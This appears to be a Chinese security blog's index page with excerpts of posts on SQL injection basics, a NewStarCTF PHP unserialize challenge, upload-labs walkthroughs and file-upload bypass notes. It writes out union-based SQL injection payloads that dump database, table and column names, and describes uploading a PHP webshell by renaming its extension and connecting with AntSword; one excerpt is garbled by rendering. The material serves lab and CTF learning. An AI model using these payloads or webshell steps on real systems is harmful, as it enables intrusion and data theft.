sql注入
原理sql注入发生原理: 用户对传入的参数未进行严格过滤处理,导致构造形成sql语句,直接输入数据库执行,从而获取和修改数据库 注入类型常见的注入方式有:字符型注入、布尔型注入、报错注入、文件读写注入、布尔盲注、时间盲注、堆叠注入、二次注入…… 基本操作1.判断显示位 1?id=SELECT first name, last_name FROM users WHERE user_id = '1' union select 1,2,3#; 2.爆数据库的名字 1?id = '1' union select 1,user(),database()--+‘; 3.爆数据库中的表 1?id = '-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+'; 4.爆表中的字段 1?id= '-1'union select 1,2,gro...
buu刷题
[NewStarCTF 公开赛赛道]UnserializeOne123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990<?phperror_reporting(0);highlight_file(__FILE__);\#Something useful for you : https://zhuanlan.zhihu.com/p/377676274class Start{ public $name; protected $func; public function __destruct() { echo "Welcome to NewStarCTF, ".$this->name; } public function _...
upload-labs
upload-labs靶场(由于版本的问题该靶场要使用php5等后缀名不能使用nts版的php最简单方法使用老版本phpstudy,第十二和第十三关的php版本要求在5.3以下且magic_quotes_gpc为关闭状态(需要自己关闭)) 第一关第一关中直接上传php文件发现其只能上传jpg png gif这种图片文件 并发现在上传操作时无法对其进行抓包所以确定其为前端验证 将一句话木马文件后缀改为jpg进行上传并进行抓包处理 使用bp抓包并将文件后缀改为php后发现成功上传文件 使用蚁剑进行连接,成功连接木马 第二关第二关发现其并不是前端验证 但直接bp抓包修改后缀名即可成功上传木马,之后使用蚁剑连接即可 第三关上传php文件后发现其设置了黑名单 不允许上传php文件,故抓包将php文件后缀改为php5进行尝试 进行多次尝试发现新版phpstudy默认下载的php版本有问题故而将版本退回2016进行尝试实验成功,原因是因为新版phpstudy下载的php版本均为nts版配置文件中无法更改识别内容故将其退回2016版本即可 详细内容参考该文章关于PHPStud...
upload知识点
upload学习知识点upload学习过程中涉及的知识点 一、配置文件_Preview Image 对配置文件的修改 upload相关配置文件 .htaccess文件的优先级高所以其危险性更大 user.ini文件生效前提是目录中存在php文件可以对其进行覆盖 二、额外数据流在Windows操作系统中,当你看到文件名后跟着”::D A T A “ 时,它表示文件的一个附加数据流 ( A l t e r n a t e D a t a S t r e a m , A D S ) 。数据流是 − − 种用于在文件内部存储额外数据的机制在普通情况下,我们使用的文件只有一个默认的数据流,可以通过文件名访问。但是 W i n d o w s N T 文件系统 ( N T F S ) 支持在文件内部创建额外的数据流,以存储其他信息。这些额外的数据流可以通过在文件名后面添加 “ … DATA”时,它表示文件的一个附加数据流(Alternate DataStream,ADS)。数据流是–种用于在文件内部存储额外数据的机制 在普通情况下,我们使用的文件只有一个默认的数据流,可以通...